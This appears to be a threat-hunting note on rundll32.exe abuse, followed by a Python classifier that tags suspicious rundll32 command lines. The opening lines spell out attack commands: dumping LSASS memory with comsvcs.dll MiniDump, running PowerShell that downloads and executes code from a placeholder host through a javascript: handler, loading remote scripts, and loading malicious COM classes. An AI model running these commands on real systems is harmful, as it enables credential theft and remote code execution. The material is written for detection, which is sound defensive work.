rundll32.exe <dllname>
rundll32.exe <dllname>,<entrypoint> <optional arguments>
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL <file_path>
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts
Control_RunDLL and Control_RunDLLAsUser can be used to run .CPL files, which are generally the small applets found in Control Panel:
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\firewall.cpl
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full
c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\microsoft\360666.png,DefaultInstall
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/XXX/XXX")
-sta and -localserver can both be used to load a maliciously registered COM component:
rundll32.exe -localserver <CLSID_GUID>
rundll32.exe -sta <CLSID_GUID>
\HKEY_CLASSES_ROOT\CLSID\<GUID>, to be read together with the figure below.
rundll32.exe <dllname>,<entrypoint> <optional arguments>
rundll32.exe uwcidcx.vb,capgj
For the -sta keyword usage, it may not be practical to automate a verdict based on the GUID alone, but a few tricks can improve hunting efficiency.
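As an added example that is not part of the original post, the following Python classifier applies the rundll32 patterns listed above (javascript: handler, comsvcs MiniDump, advpack LaunchINFSection with a non-.inf file, -sta/-localserver with a CLSID, and a module that is not a .dll/.cpl) to process command lines such as those a hunter would pull from process-creation telemetry. The sample command lines, tag names and the placeholder GUID and URL are constructed for this example.

```python
import ntpath
import re

# Constructed sample process command lines, modelled on the page's rundll32 examples.
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts',
    r'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full',
    r'c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\microsoft\360666.png,DefaultInstall',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://example.invalid/x")',
    'rundll32.exe \u2013sta {00000000-0000-0000-0000-000000000000}',  # placeholder CLSID, en-dash as copied
    r'rundll32.exe uwcidcx.vb,capgj',
]

EXE_RE = re.compile(r'\s*"?([^"\s]*rundll32(?:\.exe)?)"?\s*(.*)$', re.I)
MODULE_RE = re.compile(r'^"?([^,\s"]+)"?\s*,\s*(\S+)')  # <dllname>,<entrypoint>
GUID_RE = re.compile(r'\{?[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?', re.I)


def classify_rundll32(cmdline):
    """Return hunting tags for one rundll32 command line (empty list = nothing notable)."""
    # En-dashes from copy/paste ("-sta" rendered as "–sta") are treated as plain hyphens.
    norm = cmdline.replace('\u2013', '-').replace('\u2014', '-')
    m = EXE_RE.match(norm)
    if not m:
        return []
    args = m.group(2)
    low = args.lower()
    tags = []
    # javascript: pseudo-protocol reaching mshtml's RunHTMLApplication export
    if low.startswith('javascript:') or 'runhtmlapplication' in low:
        tags.append('script-protocol-handler')
    # -sta / -localserver followed by a CLSID loads a COM class registered under HKCR\CLSID\<GUID>
    if re.match(r'-(sta|localserver)\b', low) and GUID_RE.search(args):
        tags.append('com-clsid-load')
    dm = MODULE_RE.match(args)
    if dm:
        module, entry = dm.group(1), dm.group(2)
        base = ntpath.basename(module).lower()
        ext = ntpath.splitext(base)[1]
        # rundll32 normally loads a .dll (or a .cpl via Control_RunDLL); anything else is odd
        if ext not in ('.dll', '.cpl'):
            tags.append('non-dll-module')
        if base == 'comsvcs.dll' and entry.lower() == 'minidump':
            tags.append('comsvcs-minidump')
        if base == 'advpack.dll' and entry.lower() == 'launchinfsection':
            # LaunchINFSection takes <inf_path>,<section>; a non-.inf path is the give-away
            inf_path = args[dm.end():].strip().split(',')[0]
            if not inf_path.lower().endswith('.inf'):
                tags.append('inf-nonstandard-extension')
    return tags
```

Command lines that only use well-known exports such as OpenAs_RunDLL on a .dll under System32 produce no tags, which is the baseline the other rules are measured against.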